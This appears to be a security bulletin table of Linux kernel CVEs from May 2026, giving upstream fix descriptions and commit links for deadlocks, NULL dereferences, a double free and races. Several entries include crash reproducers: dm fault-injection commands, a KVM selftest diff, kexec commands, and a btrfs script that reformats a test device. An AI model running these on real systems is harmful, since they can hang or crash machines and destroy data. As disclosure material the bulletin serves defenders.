| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: verisilicon: Avoid G2 bus error while decoding H.264 and HEVC For the i.MX8MQ platform, there is a hardware limitation: the g1 VPU and g2 VPU cannot decode simultaneously; otherwise, it will cause the bus error below and produce corrupted pictures, and may even lead to a system hang. [ 110.527986] hantro-vpu 38310000.video-codec: frame decode timed out. [ 110.583517] hantro-vpu 38310000.video-codec: bus error detected. Therefore, it is necessary to ensure that g1 and g2 operate alternately. This allows for successful multi-instance decoding of H.264 and HEVC. To achieve this, g1 and g2 share the same v4l2_m2m_dev, and then the v4l2_m2m_dev can handle the scheduling. | 2026-05-08 | not yet calculated | CVE-2026-43310 | https://git.kernel.org/stable/c/286d629d10640bc22f3bf46aa4f356eb7975e862 https://git.kernel.org/stable/c/e0203ddf9af7c8e170e1e99ce83b4dc07f0cd765 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: soc/tegra: pmc: Fix unsafe generic_handle_irq() call Currently, when resuming from system suspend on Tegra platforms, the following warning is observed: WARNING: CPU: 0 PID: 14459 at kernel/irq/irqdesc.c:666 Call trace: handle_irq_desc+0x20/0x58 (P) tegra186_pmc_wake_syscore_resume+0xe4/0x15c syscore_resume+0x3c/0xb8 suspend_devices_and_enter+0x510/0x540 pm_suspend+0x16c/0x1d8 The warning occurs because generic_handle_irq() is being called from a non-interrupt context, which is considered unsafe. Fix this warning by deferring the generic_handle_irq() call to an IRQ work which gets executed in hard IRQ context, where generic_handle_irq() can be called safely. When PREEMPT_RT kernels are used, regular IRQ work (initialized with init_irq_work) is deferred to run in per-CPU kthreads in preemptible context rather than hard IRQ context. Hence, use the IRQ_WORK_INIT_HARD variant so that with PREEMPT_RT kernels, the IRQ work is processed in hardirq context instead of being deferred to a thread, which is required for calling generic_handle_irq(). On non-PREEMPT_RT kernels, both init_irq_work() and IRQ_WORK_INIT_HARD() execute in IRQ context, so this change has no functional impact for standard kernel configurations. [treding@nvidia.com: miscellaneous cleanups] | 2026-05-08 | not yet calculated | CVE-2026-43311 | https://git.kernel.org/stable/c/64016227dcdb968b7030eda04304f3d0df5d209d https://git.kernel.org/stable/c/e6d96073af681780820c94079b978474a8a44413 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: i2c: ov5647: Initialize subdev before controls In ov5647_init_controls() we call v4l2_get_subdevdata, but it is initialized by v4l2_i2c_subdev_init() in the probe, which currently happens after init_controls(). This can result in a segfault if the error condition is hit, and we try to access i2c_client, so fix the order. | 2026-05-08 | not yet calculated | CVE-2026-43312 | https://git.kernel.org/stable/c/f2a1998bc0053ebfe137f65081ed13afd9f34502 https://git.kernel.org/stable/c/59e372aa4cf60e2500eba7f978acdcb18bb49032 https://git.kernel.org/stable/c/cabd025182cfed4a19b3aab57493e312d681e398 https://git.kernel.org/stable/c/2dedda97a64e7735844609c6c77c0dd953d73833 https://git.kernel.org/stable/c/8ecb21c20387cc0c8aa00489a21ccc69f6b0f5d1 https://git.kernel.org/stable/c/fb69e4842f5b463ff5f121d2ac7746014e3477ea https://git.kernel.org/stable/c/eee13cbccacb6d0a3120c126b8544030905b069d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ACPI: processor: Fix NULL-pointer dereference in acpi_processor_errata_piix4() In acpi_processor_errata_piix4(), the pointer dev is first assigned an IDE device and then reassigned an ISA device: dev = pci_get_subsys(..., PCI_DEVICE_ID_INTEL_82371AB, ...); dev = pci_get_subsys(..., PCI_DEVICE_ID_INTEL_82371AB_0, ...); If the first lookup succeeds but the second fails, dev becomes NULL. This leads to a potential null-pointer dereference when dev_dbg() is called: if (errata.piix4.bmisx) dev_dbg(&dev->dev, ...); To prevent this, use two temporary pointers and retrieve each device independently, avoiding overwriting dev with a possible NULL value. [ rjw: Subject adjustment, added an empty code line ] | 2026-05-08 | not yet calculated | CVE-2026-43313 | https://git.kernel.org/stable/c/06724a60cfa9767ea90b0f5d3dfb5cdd251b64f5 https://git.kernel.org/stable/c/ad86ac604f8391c0212a91412d4f764c7a85f254 https://git.kernel.org/stable/c/01e8751b37a366b1ca561add0042f2ceb18c03bf https://git.kernel.org/stable/c/b803811485ac0b2f774b6bf3abc8b999ba3b7033 https://git.kernel.org/stable/c/29f60d3d06818d40118a30d663231f027ae87a05 https://git.kernel.org/stable/c/0398b641be2b66c2fc7e0163c606ef19372e7ad5 https://git.kernel.org/stable/c/f132e089fe89cadc2098991f0a3cb05c3f824ac6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: dm: remove fake timeout to avoid leak request Since commit 15f73f5b3e59 ("blk-mq: move failure injection out of blk_mq_complete_request"), drivers are responsible for calling blk_should_fake_timeout() at appropriate code paths and opportunities. However, the dm driver does not implement its own timeout handler and relies on the timeout handling of its slave devices. If an io-timeout-fail error is injected to a dm device, the request will be leaked and never completed, causing tasks to hang indefinitely. Reproduce: 1. prepare dm which has iscsi slave device 2. inject io-timeout-fail to dm echo 1 >/sys/class/block/dm-0/io-timeout-fail echo 100 >/sys/kernel/debug/fail_io_timeout/probability echo 10 >/sys/kernel/debug/fail_io_timeout/times 3. read/write dm 4. iscsiadm -m node -u Result: hang task like below [ 862.243768] INFO: task kworker/u514:2:151 blocked for more than 122 seconds. [ 862.244133] Tainted: G E 6.19.0-rc1+ #51 [ 862.244337] "echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables this message. [ 862.244718] task:kworker/u514:2 state:D stack:0 pid:151 tgid:151 ppid:2 task_flags:0x4288060 flags:0x00080000 [ 862.245024] Workqueue: iscsi_ctrl_3:1 __iscsi_unbind_session [scsi_transport_iscsi] [ 862.245264] Call Trace: [ 862.245587] <TASK> [ 862.245814] __schedule+0x810/0x15c0 [ 862.246557] schedule+0x69/0x180 [ 862.246760] blk_mq_freeze_queue_wait+0xde/0x120 [ 862.247688] elevator_change+0x16d/0x460 [ 862.247893] elevator_set_none+0x87/0xf0 [ 862.248798] blk_unregister_queue+0x12e/0x2a0 [ 862.248995] __del_gendisk+0x231/0x7e0 [ 862.250143] del_gendisk+0x12f/0x1d0 [ 862.250339] sd_remove+0x85/0x130 [sd_mod] [ 862.250650] device_release_driver_internal+0x36d/0x530 [ 862.250849] bus_remove_device+0x1dd/0x3f0 [ 862.251042] device_del+0x38a/0x930 [ 862.252095] __scsi_remove_device+0x293/0x360 [ 862.252291] scsi_remove_target+0x486/0x760 [ 862.252654] __iscsi_unbind_session+0x18a/0x3e0 [scsi_transport_iscsi] [ 862.252886] process_one_work+0x633/0xe50 [ 862.253101] worker_thread+0x6df/0xf10 [ 862.253647] kthread+0x36d/0x720 [ 862.254533] ret_from_fork+0x2a6/0x470 [ 862.255852] ret_from_fork_asm+0x1a/0x30 [ 862.256037] </TASK> Remove the blk_should_fake_timeout() check from dm, as dm has no native timeout handling and should not attempt to fake timeouts. | 2026-05-08 | not yet calculated | CVE-2026-43314 | https://git.kernel.org/stable/c/ece6720de9403260088209b0b92d45e0b49ff856 https://git.kernel.org/stable/c/8200fca818c1e2f65bc6cb16d934ff6049302197 https://git.kernel.org/stable/c/b307b6307f6459841312432bd4bc9519cbac97f5 https://git.kernel.org/stable/c/4f9e7ca933a9fbf9912a384b061a00c77332cbf0 https://git.kernel.org/stable/c/cf2d06c9fd4b6521ea5b7f73c99c64c2c6f5e224 https://git.kernel.org/stable/c/6cdb21e0c9fdee484feba14fc9e72e9d07daf9f3 https://git.kernel.org/stable/c/c8a23d4c995ef4227bd4de64cd3910637ee6162e https://git.kernel.org/stable/c/f3a9c95a15d2f4466acad5c68faeff79ca5e9f47 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: KVM: nSVM: Remove a user-triggerable WARN on nested_svm_load_cr3() succeeding Drop the WARN in svm_set_nested_state() on nested_svm_load_cr3() failing as it is trivially easy to trigger from userspace by modifying CPUID after loading CR3. E.g. modifying the state restoration selftest like so: --- tools/testing/selftests/kvm/x86/state_test.c +++ tools/testing/selftests/kvm/x86/state_test.c @@ -280,7 +280,16 @@ int main(int argc, char *argv[]) /* Restore state in a new VM. */ vcpu = vm_recreate_with_one_vcpu(vm); - vcpu_load_state(vcpu, state); + + if (stage == 4) { + state->sregs.cr3 = BIT(44); + vcpu_load_state(vcpu, state); + + vcpu_set_cpuid_property(vcpu, X86_PROPERTY_MAX_PHY_ADDR, 36); + __vcpu_nested_state_set(vcpu, &state->nested); + } else { + vcpu_load_state(vcpu, state); + } /* * Restore XSAVE state in a dummy vCPU, first without doing generates: WARNING: CPU: 30 PID: 938 at arch/x86/kvm/svm/nested.c:1877 svm_set_nested_state+0x34a/0x360 [kvm_amd] Modules linked in: kvm_amd kvm irqbypass [last unloaded: kvm] CPU: 30 UID: 1000 PID: 938 Comm: state_test Tainted: G W 6.18.0-rc7-58e10b63777d-next-vm Tainted: [W]=WARN Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 0.0.0 02/06/2015 RIP: 0010:svm_set_nested_state+0x34a/0x360 [kvm_amd] Call Trace: <TASK> kvm_arch_vcpu_ioctl+0xf33/0x1700 [kvm] kvm_vcpu_ioctl+0x4e6/0x8f0 [kvm] __x64_sys_ioctl+0x8f/0xd0 do_syscall_64+0x61/0xad0 entry_SYSCALL_64_after_hwframe+0x4b/0x53 Simply delete the WARN instead of trying to prevent userspace from shoving "illegal" state into CR3. For better or worse, KVM's ABI allows userspace to set CPUID after SREGS, and vice versa, and KVM is very permissive when it comes to guest CPUID. I.e. attempting to enforce the virtual CPU model when setting CPUID could break userspace. Given that the WARN doesn't provide any meaningful protection for KVM or benefit for userspace, simply drop it even though the odds of breaking userspace are minuscule. Opportunistically delete a spurious newline. | 2026-05-08 | not yet calculated | CVE-2026-43315 | https://git.kernel.org/stable/c/155ec243ef726f4bc49536fa0bfb565dc011ab17 https://git.kernel.org/stable/c/580ea57840864d40e019bc13fd26afdc8d510a2f https://git.kernel.org/stable/c/deb8f6dfd31d94b18dbeeaa8c01fbec5fc70fd2b https://git.kernel.org/stable/c/ce904c8a5bbe697eae0f7e34b07095bd7a6dee19 https://git.kernel.org/stable/c/969e5e13ff5c18603f21d1f9f64ec9194e141ac0 https://git.kernel.org/stable/c/ebb2ab4f1c87d6b52776292cf7dc16aea48e95f8 https://git.kernel.org/stable/c/fc3ba56385d03501eb582e4b86691ba378e556f9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: solo6x10: Check for out of bounds chip_id Clang with CONFIG_UBSAN_SHIFT=y noticed a condition where a signed type (literal "1" is an "int") could end up being shifted beyond 32 bits, so instrumentation was added (and due to the double is_tw286x() call seen via inlining), Clang decides the second one must now be undefined behavior and elides the rest of the function[1]. This is a known problem with Clang (that is still being worked on), but we can avoid the entire problem by actually checking the existing max chip ID, and now there is no runtime instrumentation added at all since everything is known to be within bounds. Additionally use an unsigned value for the shift to remove the instrumentation even without the explicit bounds checking. [hverkuil: fix checkpatch warning for is_tw286x] | 2026-05-08 | not yet calculated | CVE-2026-43316 | https://git.kernel.org/stable/c/c327192ca26670cf6e588c1eeda66cd2fa97630e https://git.kernel.org/stable/c/0b3dadada2417782a63ce32dae05bafe1c949e3f https://git.kernel.org/stable/c/603e3859393ee2ce91393b7d05e6e56e4b66e5cd https://git.kernel.org/stable/c/33af366211ee78e3b074ff44a16121e537e86826 https://git.kernel.org/stable/c/5849ae68d7b8b6ad55cc1bf0d227dd2ae6362528 https://git.kernel.org/stable/c/d29f33b2cf98e4901cd5457d1ee34062e808df73 https://git.kernel.org/stable/c/4d6db0c6bbbfd8d7bbdbf7ab6a9c003752abf116 https://git.kernel.org/stable/c/0fdf6323c35a134f206dcad5babb4ff488552076 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: most: core: fix leak on early registration failure A recent commit fixed a resource leak on early registration failures but for some reason left out the first error path which still leaks the resources associated with the interface. Fix up also the first error path so that the interface is always released on errors. | 2026-05-08 | not yet calculated | CVE-2026-43317 | https://git.kernel.org/stable/c/bbfe49ffb892bddf32c34bea95b7ff0fc30affb5 https://git.kernel.org/stable/c/f1ba620f9e8d7291f80c0554e4b820f5fb30e819 https://git.kernel.org/stable/c/5fd4396c2e48e90cc2597a86c18227d56ea845f0 https://git.kernel.org/stable/c/2c198c272f9c9213b0fdf6b4a879f445c574f416 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu: fix sync handling in amdgpu_dma_buf_move_notify Invalidating a dmabuf will impact other users of the shared BO. In the scenario where process A moves the BO, it needs to inform process B about the move and process B will need to update its page table. The commit fixes a synchronisation bug caused by the use of the ticket: it made amdgpu_vm_handle_moved behave as if updating the page table immediately was correct but in this case it's not. An example is the following scenario, with 2 GPUs and glxgears running on GPU0 and Xorg running on GPU1, on a system where P2P PCI isn't supported: glxgears: export linear buffer from GPU0 and import using GPU1 submit frame rendering to GPU0 submit tiled->linear blit Xorg: copy of linear buffer The sequence of jobs would be: drm_sched_job_run # GPU0, frame rendering drm_sched_job_queue # GPU0, blit drm_sched_job_done # GPU0, frame rendering drm_sched_job_run # GPU0, blit move linear buffer for GPU1 access # amdgpu_dma_buf_move_notify -> update pt # GPU0 At this point the blit job on GPU0 is still running and would likely produce a page fault. | 2026-05-08 | not yet calculated | CVE-2026-43318 | https://git.kernel.org/stable/c/82a7ea35a1526bef8ae170c33ff80e5db7728961 https://git.kernel.org/stable/c/89a9389ad70d3c69538e59d87df67d407aef4c26 https://git.kernel.org/stable/c/3307459eb3583115264421e859858d1f90f3694a https://git.kernel.org/stable/c/b18fc0ab837381c1a6ef28386602cd888f2d9edf |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: spi: spidev: fix lock inversion between spi_lock and buf_lock The spidev driver previously used two mutexes, spi_lock and buf_lock, but acquired them in different orders depending on the code path: write()/read(): buf_lock -> spi_lock ioctl(): spi_lock -> buf_lock This AB-BA locking pattern triggers lockdep warnings and can cause real deadlocks: WARNING: possible circular locking dependency detected spidev_ioctl() -> mutex_lock(&spidev->buf_lock) spidev_sync_write() -> mutex_lock(&spidev->spi_lock) *** DEADLOCK *** The issue is reproducible with a simple userspace program that performs write() and SPI_IOC_WR_MAX_SPEED_HZ ioctl() calls from separate threads on the same spidev file descriptor. Fix this by simplifying the locking model and removing the lock inversion entirely. spidev_sync() no longer performs any locking, and all callers serialize access using spi_lock. buf_lock is removed since its functionality is fully covered by spi_lock, eliminating the possibility of lock ordering issues. This removes the lock inversion and prevents deadlocks without changing userspace ABI or behaviour. | 2026-05-08 | not yet calculated | CVE-2026-43319 | https://git.kernel.org/stable/c/f8431b8672231d378b03176fe74c95adfd3522cf https://git.kernel.org/stable/c/e341e18215030af2136836b78508e0d798916df7 https://git.kernel.org/stable/c/41ccfac7d302968a4f32b5f7b012d066c5f5cdf8 https://git.kernel.org/stable/c/40534d19ed2afb880ecf202dab26a8e7a5808d16 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amd/display: Fix dsc eDP issue [why] Need to add function hook check before use | 2026-05-08 | not yet calculated | CVE-2026-43320 | https://git.kernel.org/stable/c/11718976c53a258c4d107aa05d68773379d0006f https://git.kernel.org/stable/c/c10fe9471f3aa352bb9d9329d0b25e28e0672243 https://git.kernel.org/stable/c/0481be9f12d8324789ccebf1e5fd0704b6e3fc99 https://git.kernel.org/stable/c/878a4b73c11111ff5f820730f59a7f8c6fd59374 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: sched/fair: Fix zero_vruntime tracking fix John reported that stress-ng-yield could make his machine unhappy and managed to bisect it to commit b3d99f43c72b ("sched/fair: Fix zero_vruntime tracking"). The combination of yield and that commit was specific enough to hypothesize the following scenario: Suppose we have 2 runnable tasks, both doing yield. Then one will be eligible and one will not be, because the average position must be in between these two entities. Therefore, the runnable task will be eligible, and be promoted a full slice (all the tasks do is yield after all). This causes it to jump over the other task and now the other task is eligible and current is no longer. So we schedule. Since we are runnable, there is no {de,en}queue. All we have is the __{en,de}queue_entity() from {put_prev,set_next}_task(). But per the fingered commit, those two no longer move zero_vruntime. All that moves zero_vruntime are tick and full {de,en}queue. This means, that if the two tasks playing leapfrog can reach the critical speed to reach the overflow point inside one tick's worth of time, we're up a creek. Additionally, when multiple cgroups are involved, there is no guarantee the tick will in fact hit every cgroup in a timely manner. Statistically speaking it will, but that same statistics does not rule out the possibility of one cgroup not getting a tick for a significant amount of time -- however unlikely. Therefore, just like with the yield() case, force an update at the end of every slice. This ensures the update is never more than a single slice behind and the whole thing is within 2 lag bounds as per the comment on entity_key(). | 2026-05-08 | not yet calculated | CVE-2026-43323 | https://git.kernel.org/stable/c/c089147074ed96ff4330739a0559394c19a3dfc8 https://git.kernel.org/stable/c/87573883c30f1a8555ff720836bb6ea231058539 https://git.kernel.org/stable/c/fb61ffb3fb30a161eb5404c27fc7635e275beafd https://git.kernel.org/stable/c/1319ea57529e131822bab56bf417c8edc2db9ae8 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: iwlwifi: mvm: don't send a 6E related command when not supported MCC_ALLOWED_AP_TYPE_CMD is related to 6E support. Do not send it if the device doesn't support 6E. Apparently, the firmware is mistakenly advertising support for this command even on AX201 which does not support 6E and then the firmware crashes. | 2026-05-08 | not yet calculated | CVE-2026-43325 | https://git.kernel.org/stable/c/c0b3fa5e0eaecd38e6a9f8f78e86f468fbde719a https://git.kernel.org/stable/c/6607d0e58ceca997816122568ce54db9e134edab https://git.kernel.org/stable/c/323156c3541e23da7e582008a7ac30cd51b60acd |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: sched_ext: Fix SCX_KICK_WAIT deadlock by deferring wait to balance callback SCX_KICK_WAIT busy-waits in kick_cpus_irq_workfn() using smp_cond_load_acquire() until the target CPU's kick_sync advances. Because the irq_work runs in hardirq context, the waiting CPU cannot reschedule and its own kick_sync never advances. If multiple CPUs form a wait cycle, all CPUs deadlock. Replace the busy-wait in kick_cpus_irq_workfn() with resched_curr() to force the CPU through do_pick_task_scx(), which queues a balance callback to perform the wait. The balance callback drops the rq lock and enables IRQs following the sched_core_balance() pattern, so the CPU can process IPIs while waiting. The local CPU's kick_sync is advanced on entry to do_pick_task_scx() and continuously during the wait, ensuring any CPU that starts waiting for us sees the advancement and cannot form cyclic dependencies. | 2026-05-08 | not yet calculated | CVE-2026-43326 | https://git.kernel.org/stable/c/c3a7903f65cf4c7fb0477eb0f8b94f326a47fe54 https://git.kernel.org/stable/c/415cb193bb9736f0e830286c72a6fa8eb2a9cc5c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: USB: dummy-hcd: Fix locking/synchronization error Syzbot testing was able to provoke an addressing exception and crash in the usb_gadget_udc_reset() routine in drivers/usb/gadgets/udc/core.c, resulting from the fact that the routine was called with a second ("driver") argument of NULL. The bad caller was set_link_state() in dummy_hcd.c, and the problem arose because of a race between a USB reset and driver unbind. These sorts of races were not supposed to be possible; commit 7dbd8f4cabd9 ("USB: dummy-hcd: Fix erroneous synchronization change"), along with a few followup commits, was written specifically to prevent them. As it turns out, there are (at least) two errors remaining in the code. Another patch will address the second error; this one is concerned with the first. The error responsible for the syzbot crash occurred because the stop_activity() routine will sometimes drop and then re-acquire the dum->lock spinlock. A call to stop_activity() occurs in set_link_state() when handling an emulated USB reset, after the test of dum->ints_enabled and before the increment of dum->callback_usage. This allowed another thread (doing a driver unbind) to sneak in and grab the spinlock, and then clear dum->ints_enabled and dum->driver. Normally this other thread would have to wait for dum->callback_usage to go down to 0 before it would clear dum->driver, but in this case it didn't have to wait since dum->callback_usage had not yet been incremented. The fix is to increment dum->callback_usage _before_ calling stop_activity() instead of after. Then the thread doing the unbind will not clear dum->driver until after the call to usb_gadget_udc_reset() safely returns and dum->callback_usage has been decremented again. | 2026-05-08 | not yet calculated | CVE-2026-43327 | https://git.kernel.org/stable/c/6350c7dd33ab481ef41c931a238361490c32d15c https://git.kernel.org/stable/c/cc97fb5969177cccce2e23b31298df220fc7570d https://git.kernel.org/stable/c/218886b2ef2dea7627d3700ab0abaf4bf9d1161f https://git.kernel.org/stable/c/791966f85b439b261bf19865cf1c07c065ffb4b4 https://git.kernel.org/stable/c/805b1833d6ed6da5086e610578a28e71bb54fbbb https://git.kernel.org/stable/c/efbd9441f1e769a7aae1813d497cec09cbdff031 https://git.kernel.org/stable/c/69ab97a693251d6a6093e630060a3c744fd58524 https://git.kernel.org/stable/c/616a63ff495df12863692ab3f9f7b84e3fa7a66d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: cpufreq: governor: fix double free in cpufreq_dbs_governor_init() error path When kobject_init_and_add() fails, cpufreq_dbs_governor_init() calls kobject_put(&dbs_data->attr_set.kobj). The kobject release callback cpufreq_dbs_data_release() calls gov->exit(dbs_data) and kfree(dbs_data), but the current error path then calls gov->exit(dbs_data) and kfree(dbs_data) again, causing a double free. Keep the direct kfree(dbs_data) for the gov->init() failure path, but after kobject_init_and_add() has been called, let kobject_put() handle the cleanup through cpufreq_dbs_data_release(). | 2026-05-08 | not yet calculated | CVE-2026-43328 | https://git.kernel.org/stable/c/56bc91ee78babe9578585a2bc137abc4b3115ff3 https://git.kernel.org/stable/c/019ea28629720c220daedf38107c8787f330dc05 https://git.kernel.org/stable/c/da39ee627fd82b52068d4d5f115749a8b7d271f9 https://git.kernel.org/stable/c/427d048e4f6acbfa01b5a8062449fe0ee8987c0d https://git.kernel.org/stable/c/d2703b4f8fb7cc6f0dfdb2dc2359cc46189e7357 https://git.kernel.org/stable/c/3bf9d023d2329a0e5379f2fd09d06ef09729cd9d https://git.kernel.org/stable/c/6dcf9d0064ce2f3e3dfe5755f98b93abe6a98e1e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: x86/kexec: Disable KCOV instrumentation after load_segments() The load_segments() function changes segment registers, invalidating GS base (which KCOV relies on for per-cpu data). When CONFIG_KCOV is enabled, any subsequent instrumented C code call (e.g. native_gdt_invalidate()) begins crashing the kernel in an endless loop. To reproduce the problem, it's sufficient to do kexec on a KCOV-instrumented kernel: $ kexec -l /boot/otherKernel $ kexec -e The real-world context for this problem is enabling crash dump collection in syzkaller. For this, the tool loads a panic kernel before fuzzing and then calls makedumpfile after the panic. This workflow requires both CONFIG_KEXEC and CONFIG_KCOV to be enabled simultaneously. Adding safeguards directly to the KCOV fast-path (__sanitizer_cov_trace_pc()) is also undesirable as it would introduce an extra performance overhead. Disabling instrumentation for the individual functions would be too fragile, so disable KCOV instrumentation for the entire machine_kexec_64.c and physaddr.c. If coverage-guided fuzzing ever needs these components in the future, other approaches should be considered. The problem is not relevant for 32 bit kernels as CONFIG_KCOV is not supported there. [ bp: Space out comment for better readability. ] | 2026-05-08 | not yet calculated | CVE-2026-43331 | https://git.kernel.org/stable/c/1e3e98596c2769721ade0418434852fb3af4849a https://git.kernel.org/stable/c/de05c66fab8847237a9ca216934e56d3ee837f08 https://git.kernel.org/stable/c/917e3ad3321e75ca0223d5ccf26ceda116aa51e1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf: reject direct access to nullable PTR_TO_BUF pointers check_mem_access() matches PTR_TO_BUF via base_type() which strips PTR_MAYBE_NULL, allowing direct dereference without a null check. Map iterator ctx->key and ctx->value are PTR_TO_BUF | PTR_MAYBE_NULL. On stop callbacks these are NULL, causing a kernel NULL dereference. Add a type_may_be_null() guard to the PTR_TO_BUF branch, matching the existing PTR_TO_BTF_ID pattern. | 2026-05-08 | not yet calculated | CVE-2026-43333 | https://git.kernel.org/stable/c/10bc4a4dcded509c5d5c67d497900c3922c604cd https://git.kernel.org/stable/c/21a10c06ffae24cb01fd174a7ab7736001d2ea56 https://git.kernel.org/stable/c/8755066f7bd0f4ac46a29d1708c7b20894539252 https://git.kernel.org/stable/c/70abd9d118da2f56beb4ec22e3a29becae373535 https://git.kernel.org/stable/c/63276547debc4d8a73eefb2c5273b2a905c961b0 https://git.kernel.org/stable/c/4f6c99dc0420f1a3d671c1b8ab8a7ac84d9cba09 https://git.kernel.org/stable/c/b0db1accbc7395657c2b79db59fa9fae0d6656f3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: interconnect: qcom: sm8450: Fix NULL pointer dereference in icc_link_nodes() The change to dynamic IDs for SM8450 platform interconnects left two links unconverted, fix it to avoid the NULL pointer dereference in runtime, when a pointer to a destination interconnect is not valid: Unable to handle kernel NULL pointer dereference at virtual address 0000000000000008 <...> Call trace: icc_link_nodes+0x3c/0x100 (P) qcom_icc_rpmh_probe+0x1b4/0x528 platform_probe+0x64/0xc0 really_probe+0xc4/0x2a8 __driver_probe_device+0x80/0x140 driver_probe_device+0x48/0x170 __device_attach_driver+0xc0/0x148 bus_for_each_drv+0x88/0xf0 __device_attach+0xb0/0x1c0 device_initial_probe+0x58/0x68 bus_probe_device+0x40/0xb8 deferred_probe_work_func+0x90/0xd0 process_one_work+0x15c/0x3c0 worker_thread+0x2e8/0x400 kthread+0x150/0x208 ret_from_fork+0x10/0x20 Code: 900310f4 911d6294 91008280 94176078 (f94002a0) ---[ end trace 0000000000000000 ]--- Kernel panic - not syncing: Oops: Fatal exception | 2026-05-08 | not yet calculated | CVE-2026-43335 | https://git.kernel.org/stable/c/77d22bf3fc5d1bcdee035979b07840c9c2ece8f2 https://git.kernel.org/stable/c/dbbd550d7c8d90d3af9fe8a12a9caff077ddb8e3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amd/display: Fix NULL pointer dereference in dcn401_init_hw() dcn401_init_hw() assumes that update_bw_bounding_box() is valid when entering the update path. However, the existing condition: ((!fams2_enable && update_bw_bounding_box) || freq_changed) does not guarantee this, as the freq_changed branch can evaluate to true independently of the callback pointer. This can result in calling update_bw_bounding_box() when it is NULL. Fix this by separating the update condition from the pointer checks and ensuring the callback, dc->clk_mgr, and bw_params are validated before use. Fixes the below: ../dc/hwss/dcn401/dcn401_hwseq.c:367 dcn401_init_hw() error: we previously assumed 'dc->res_pool->funcs->update_bw_bounding_box' could be null (see line 362) (cherry picked from commit 86117c5ab42f21562fedb0a64bffea3ee5fcd477) | 2026-05-08 | not yet calculated | CVE-2026-43337 | https://git.kernel.org/stable/c/10c13c111d0d7f8e101c742feff264fc98e3f9f7 https://git.kernel.org/stable/c/2d4a6f0702c5211e0be8b688c5fc24f082ec74d6 https://git.kernel.org/stable/c/e927b36ae18b66b49219eaa9f46edc7b4fdbb25e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: btrfs: reserve enough transaction items for qgroup ioctls Currently our qgroup ioctls don't reserve any space, they just do a transaction join, which does not reserve any space, neither for the quota tree updates nor for the delayed refs generated when updating the quota tree. The quota root uses the global block reserve, which is fine most of the time since we don't expect a lot of updates to the quota root, or to be too close to -ENOSPC such that other critical metadata updates need to resort to the global reserve. However this is not optimal, as not reserving proper space may result in a transaction abort due to not reserving space for delayed refs and then abusing the use of the global block reserve. For example, the following reproducer (which is unlikely to model any real world use case, but just to illustrate the problem), triggers such a transaction abort due to -ENOSPC when running delayed refs: $ cat test.sh #!/bin/bash DEV=/dev/nullb0 MNT=/mnt/nullb0 umount $DEV &> /dev/null # Limit device to 1G so that it's much faster to reproduce the issue. mkfs.btrfs -f -b 1G $DEV mount -o commit=600 $DEV $MNT fallocate -l 800M $MNT/filler btrfs quota enable $MNT for ((i = 1; i <= 400000; i++)); do btrfs qgroup create 1/$i $MNT done umount $MNT When running this, we can see in dmesg/syslog that a transaction abort happened: [436.490] BTRFS error (device nullb0): failed to run delayed ref for logical 30408704 num_bytes 16384 type 176 action 1 ref_mod 1: -28 [436.493] ------------[ cut here ]------------ [436.494] BTRFS: Transaction aborted (error -28) [436.495] WARNING: fs/btrfs/extent-tree.c:2247 at btrfs_run_delayed_refs+0xd9/0x110 [btrfs], CPU#4: umount/2495372 [436.497] Modules linked in: btrfs loop (...) [436.508] CPU: 4 UID: 0 PID: 2495372 Comm: umount Tainted: G W 6.19.0-rc8-btrfs-next-225+ #1 PREEMPT(full) [436.510] Tainted: [W]=WARN [436.511] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.2-0-gea1b7a073390-prebuilt.qemu.org 04/01/2014 [436.513] RIP: 0010:btrfs_run_delayed_refs+0xdf/0x110 [btrfs] [436.514] Code: 0f 82 ea (...) [436.518] RSP: 0018:ffffd511850b7d78 EFLAGS: 00010292 [436.519] RAX: 00000000ffffffe4 RBX: ffff8f120dad37e0 RCX: 0000000002040001 [436.520] RDX: 0000000000000002 RSI: 00000000ffffffe4 RDI: ffffffffc090fd80 [436.522] RBP: 0000000000000000 R08: 0000000000000001 R09: ffffffffc04d1867 [436.523] R10: ffff8f18dc1fffa8 R11: 0000000000000003 R12: ffff8f173aa89400 [436.524] R13: 0000000000000000 R14: ffff8f173aa89400 R15: 0000000000000000 [436.526] FS: 00007fe59045d840(0000) GS:ffff8f192e22e000(0000) knlGS:0000000000000000 [436.527] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [436.528] CR2: 00007fe5905ff2b0 CR3: 000000060710a002 CR4: 0000000000370ef0 [436.530] Call Trace: [436.530] <TASK> [436.530] btrfs_commit_transaction+0x73/0xc00 [btrfs] [436.531] ? btrfs_attach_transaction_barrier+0x1e/0x70 [btrfs] [436.532] sync_filesystem+0x7a/0x90 [436.533] generic_shutdown_super+0x28/0x180 [436.533] kill_anon_super+0x12/0x40 [436.534] btrfs_kill_super+0x12/0x20 [btrfs] [436.534] deactivate_locked_super+0x2f/0xb0 [436.534] cleanup_mnt+0xea/0x180 [436.535] task_work_run+0x58/0xa0 [436.535] exit_to_user_mode_loop+0xed/0x480 [436.536] ? __x64_sys_umount+0x68/0x80 [436.536] do_syscall_64+0x2a5/0xf20 [436.537] entry_SYSCALL_64_after_hwframe+0x76/0x7e 